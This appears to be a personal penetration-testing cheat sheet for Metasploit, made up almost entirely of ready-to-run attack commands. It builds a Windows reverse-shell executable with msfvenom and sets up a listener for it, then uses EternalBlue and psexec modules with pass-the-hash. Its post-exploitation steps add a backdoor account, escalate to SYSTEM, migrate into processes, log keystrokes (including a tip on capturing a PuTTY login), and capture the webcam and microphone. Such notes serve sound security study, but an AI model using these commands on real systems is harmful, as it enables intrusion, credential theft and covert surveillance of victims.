Metasploit

msfsearch whatever

msfconcole
search Nostromo
use exploit/multi/http/nostromo_code_exec
show options

Format:
Exploit/Payload/Auxiliary/PostModules

ms08_067_netapi.rb
  .. eternal blue - messy, memory, could crash system
  .. get out of this as soon as you can and use psexec

ms17_010_psexec.rb   ..eternal blue - friendly version
  .. sends a file, authenticates nicely, runs that file as service
  .. Pentesters Pledge!!

msfvenom -l | grep windows
msfvenom --list encoders
msfvenom --list format
msfvenom --list payloads | grep java
msfvenom --help-formats

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.X.X LPORT=8080 -f exe > /tmp/file.exe

python3 -m http.server   ..share with python (optional)

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"Write-Output 'Hello World'\"; pause" -f exe > hi.exe

> sudo msfconsole
show exploits

     excellent - Works!!!!!
     great     - Might Work
     good      - Blah
     average   - Blah
     low       - Blah
     manual    - Blah

use exploit/multi/handler             
set PAYLOAD windows/shell/reverse_tcp  ..same as venom

show options
set LPORT 8080      ..same as venom/incoming
set LHOST 0.0.0.0   ..any
exploit -j          ..job to background

Ctr-C          ..kill session you are in
jobs           ..jobs listening

sessions -h    ..help
sessions -K    ..Kill all sessions
sessions -l    ..list
sessions -i 1  ..interact

(no autocomplete)

whoami
netstat -na
tasklist
cd c:\
dir
ipconfig
ipconfig /displaydns
net user
net user bob Password1 /add

getuid    .. www
use priv  .. loading privesc
getsystem .. grab system acct
getuid    .. system

?        ..help
cd       ..change dir
lcd      ..local cd
pwd   
ls
cat
download
mkdir
edit     ..dont trust this though

sysinfo
shutdown
reboot
reg      ..registry
shell    ..go to the 'normal shell'
exit

kill
execute

screenshot -p my.jpg
screenshot -p /tmp/screen.jpg
idletime
uictl [enable/disable] [keyboard/mouse]
webcam_list
webcam_snap
record_mic

keyscan_start  ..keylogging
keyscan_dump   ..view
keyscan_stop
(Could force putty to crash, and capture their login!)

getuid         ..userid
getpid         ..2952

ps             ..process list
ps -h          ..process list (help)
ps -S notepad  ..search for notepad
migrate 3996   ..migrate into notepad
getpid         ..3996

mtp > run post/windows/gather/win_privs cd\ & dir /b /s proof.txt type c:\pathto\proof.txt

use exploit1
set RHOST victim1
set PAYLOAD xyz
exploit
mtp> ctrl-z or background
msf> route add victim2subnet netmask sid
use exploit2
set RHOST victim2
set PAYLOAD xyz
exploit

Did not try this one:
MTP> portfwd add -l 5555 -p 22 -r Target2

Pass the HASH to metasploit:
Must come from: system, ram, sam-db, ntds.dit
Not sniffed from the network (diff salts)
Note: Patch in 2014
Local account is now disabled over network

msfconsole
msf> use exploit/windows/smb/psexec
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> set RHOSTS 10.10.10.10
msf> set LHOSTS 10.10.x.x
msf> set smbuser monk
msf> set smbpass LMHASHXXX:NTHASHXXX
msf> exploit       ..error: Exploit failed ActiveRecord
msf> db_disconnect ..fix the bug in metasploit
msf> exploit       ..win!

getuid
getpid
ifconfig
shell
net user
net user bob Password1 /add